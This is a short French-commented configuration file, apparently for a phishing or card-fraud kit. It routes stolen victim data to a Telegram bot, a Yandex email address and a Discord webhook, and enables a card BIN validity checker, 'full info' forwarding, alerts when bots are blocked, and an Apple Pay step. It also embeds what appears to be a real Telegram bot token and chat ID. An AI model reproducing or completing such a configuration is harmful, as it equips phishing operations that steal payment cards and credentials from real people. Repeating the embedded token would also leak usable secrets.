; Bienvenue dans la config
; Remplacez " true " par " false " pour désactiver une option
; Remplacez les valeurs par défaut par vos vrais valeurs ( example@example.com . . . )

[Telegram sending]
enable_telegram     = true
enable_notification_bot_blocked_telegram = true
telegram_token     = "7297044544:AAGNcG6EbkSqDCs93qRm2zaCJHcZi2yb_jc"
telegram_chat_id = "-7222383115"

[Email sending]
enable_email = true
receipt_email   = "kimj0ngr3z@yandex.com"

[Disord sending]
enable_discord = true
discord_api_hook = "https://discord.com/api/webhooks/xxx/xxx"


[Options]
verify_email = true ;                   Active ou non la vérification de l'email ( @gmail.com etc . . . )
verify_card_validity = true ;           Active ou non le Bin Checker

send_full_information = false ;          Active ou non l'envoi du Full info

[Apple Pay]
enable_apple_pay = true;
timer_apple_pay = 40;

